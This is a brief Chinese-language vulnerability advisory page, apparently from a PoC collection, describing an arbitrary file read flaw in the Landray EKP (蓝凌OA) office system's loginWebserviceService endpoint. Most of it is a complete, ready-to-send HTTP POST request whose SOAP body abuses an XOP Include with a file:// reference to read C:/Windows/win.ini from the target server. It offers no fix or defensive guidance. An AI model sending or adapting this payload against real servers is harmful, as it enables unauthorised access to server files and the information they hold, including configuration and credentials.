蓝凌OA loginWebserviceService 任意文件读取漏洞

日期: 2024-12-13 | 影响软件: 蓝凌EKP | POC: 已公开

漏洞描述

蓝凌oa办公系统是用于即时办公通讯的oa办公工具。深圳市蓝凌软件股份有限公司数字OA存在任意文件读取漏洞,攻击者可利用该漏洞获取服务器相关信息。

PoC代码

POST /sys/webservice/loginWebserviceService HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
SOAPAction: ""
Accept-Encoding: gzip, deflate
 
------4upt9dwdca8rtwq9osuz
Content-Disposition: form-data; name="a"
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://sso.authentication.sys.kmss.landray.com/">
<soapenv:Header/>
<soapenv:Body>
    <web:getLoginSessionId>
        <arg0>
            <beginTimeStamp>a</beginTimeStamp>
            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
        </arg0>
    </web:getLoginSessionId>
</soapenv:Body>
</soapenv:Envelope>
------4upt9dwdca8rtwq9osuz--

相关漏洞推荐